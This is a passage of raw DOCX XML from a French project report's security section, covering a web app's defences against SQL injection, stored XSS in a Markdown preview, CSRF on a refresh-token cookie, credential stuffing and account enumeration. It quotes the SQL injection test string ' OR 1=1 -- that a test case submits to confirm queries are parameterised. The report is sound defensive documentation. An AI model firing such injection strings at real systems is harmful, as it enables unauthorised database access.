            <wp:docPr id="57" name="Picture 57"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ebd76a93a971-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5347257" cy="288391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En Python,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isinstance(True, int)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vaut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un client envoyant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"quota_daily_limit": true}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aurait donc positionné le quota à 1 sans que la validation s'y oppose. Ce n'est pas une faille grave, mais c'est un rappel utile :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">valider un type ne suffit pas si le langage a des sous-typages implicites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Les bornes de longueur ne sont pas de l'ergonomie mais une mesure de disponibilité : sans la limite de 3 000 caractères sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">contenu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, un appel unique pourrait occuper le moteur d'inférence pendant des minutes, et sans le plafond de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">per_page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>une requête suffirait à charger toute la table en mémoire (§ 7.3).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:id="114" w:name="X33e80f1257b6bbe875715b824d95e97cb733980"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aucune requête n'est construite par concaténation ou par formatage de chaîne. Toutes passent par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">select()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et des comparaisons sur des attributs de modèle, que SQLAlchemy transmet en paramètres liés. C'est une propriété vérifiable par lecture : le projet ne contient ni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execute("SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>, ni f-string dans une requête. Le cas TS-02 (§ 9) le confirme par l'exécution, en soumettant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans les champs de recherche, de titre et d'email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les contraintes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du script MySQL (§ 5.5) ajoutent une seconde barrière au niveau du SGBD : même une écriture directe ne peut pas insérer un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hors des trois valeurs prévues.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:id="115" w:name="Xde1016f219f5b2035b3913148d4260898cdbac3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le risque est concentré sur l'aperçu Markdown, seul endroit où du HTML est injecté dans le DOM par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">v-html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La vulnérabilité XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stockée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>que présentait la première version, son mécanisme d'aggravation par l'enregistrement automatique, et sa correction par DOMPurify sont détaillés en § 7.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois lignes de défense se superposent, et c'est leur indépendance qui compte :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le contenu est stocké en Markdown brut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, jamais en HTML. Même si l'assainissement échouait, la donnée en base n'est pas du HTML exécutable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La sortie de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">marked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est assainie par DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avec le profil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, qui retire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, les attributs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">on*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iframe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et les URI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">javascript:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le refresh token est dans un cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">httpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>: même un XSS réussi ne permet pas de voler la session longue durée (§ 7.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>La veille a montré que la deuxième ligne est elle-même un composant à maintenir — CVE-2026-0540 affecte la version déclarée par le projet (§ 11). C'est précisément l'argument qui justifie de conserver les lignes 1 et 3 : une mesure de sécurité unique est un point de défaillance unique.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="X43c2787c9850fa8aa67b082c0e2bddaf1c79309"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'API n'utilise pas de session de navigateur pour autoriser les appels métier : l'autorisation repose sur l'en-tête</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que le navigateur n'ajoute jamais automatiquement à une requête inter-site. Les routes de documents, de dossiers, d'IA et d'administration ne sont donc pas exposées au CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le seul point exposé est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, qui s'authentifie par un cookie. Trois mesures le couvrent :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SameSite=Strict empêche l'envoi du cookie sur toute requête inter-site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">path=/auth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">limite la portée du cookie ; et l'origine CORS est une liste explicite, jamais</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 6). Un jeton CSRF dédié par double-submit a été étudié et écarté : il n'aurait rien ajouté ici, puisqu'un XSS réussi permettrait de lire le cookie et de forger l'en-tête — cette protection suppose donc le XSS de l'aperçu déjà fermé (§ 7.1), et les deux failles sont liées.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:id="117" w:name="X976a6e4e95f16d2446480716f11e8a0402ce938"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation de débit et énumération de comptes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2597088" cy="888372"/>
            <wp:docPr id="58" name="Picture 58"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ba349b7bc786-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2597088" cy="888372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les trois seuils ne sont pas identiques parce que les menaces diffèrent. Sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la menace est le bourrage d'identifiants, qui demande un débit élevé : 5 par minute le rend impraticable sans gêner un utilisateur qui se trompe. Sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/register</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/forgot-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la menace est l'abus de ressource — création massive de comptes, envoi massif de courriels depuis une adresse d'expédition qui serait vite signalée comme émettrice de pourriel : une limite horaire est plus adaptée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La réponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est normalisée en JSON et volontairement peu bavarde, sans indiquer le nombre de tentatives restantes ni la durée du blocage (§ 6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'anti-énumération sur la récupération de mot de passe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est appliquée strictement : la réponse est identique que l'adresse existe ou non.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4768248" cy="388672"/>
            <wp:docPr id="59" name="Picture 59"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="37a8d9227daa-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4768248" cy="388672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le même raisonnement s'applique à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, où un mot de passe erroné et un compte inexistant renvoient tous deux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>avec le message « Email ou mot de passe incorrect ». Cette cohérence connaît une exception, documentée ci-après.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:id="118" w:name="X29ccdf8d9158e4b7c89bb71644f6012126d1351"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secrets, configuration et appels sortants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Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucun dans le code ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">exclu par</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.gitignore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env.example</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>documenté (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucune valeur de repli : l'application refuse de démarrer sans elle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">COOKIE_SECURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dérivé de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">APP_ENV</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">True</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hors développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste explicite d'origines, jamais</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, avec</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">supports_credentials=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Historique Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ni</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
            <w:r>
              <w:t>, ni base de développement, ni clé — vérifié par le cas TS-06 (§ 9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Appels sortants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Une seule URL contactée,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OLLAMA_URL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, lue en configuration ; aucune URL issue d'une entrée utilisateur (pas de surface SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moteur d'inférence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
